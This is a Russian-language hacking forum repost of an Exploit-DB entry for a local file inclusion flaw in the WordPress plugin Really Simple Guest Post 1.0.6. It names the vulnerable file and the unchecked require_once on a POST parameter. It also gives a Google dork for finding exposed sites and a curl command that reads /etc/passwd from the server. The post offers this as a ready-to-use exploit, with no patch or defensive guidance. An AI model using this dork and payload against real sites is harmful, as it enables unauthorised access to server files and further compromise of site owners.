Exploit WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37209
Проверка EDB
  1. Пройдено
Автор
KUROI'SH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2015-06-05
WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion
Код:
# Exploit Title: Wordpress Really Simple Guest Post File Include
# Google Dork: inurl:"really-simple-guest-post" intitle:"index of"
# Date: 04/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/really-simple-guest-post/
# Version: <=1.0.6
# Tested on: Linux

The vulnerable file is called:
simple-guest-post-submit.php and its full path is
/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
The vulnerable code is as follows:
(line 8)
require_once($_POST["rootpath"]);
As you can see, the require_once function includes a data based on
user-input without any prior verification.
So, an attacker can exploit this flaw and come directly into the url
/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
and send a post data like: "rootpath=the_file_to_include"

Proof of concept:
curl -X POST -F "rootpath=/etc/passwd" --url
http://localhost/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
which will print out the content of /etc/passwd file.

Greats to Black Sniper & Moh Ooasiic
by Kuroi'SH
 
Источник
www.exploit-db.com

Похожие темы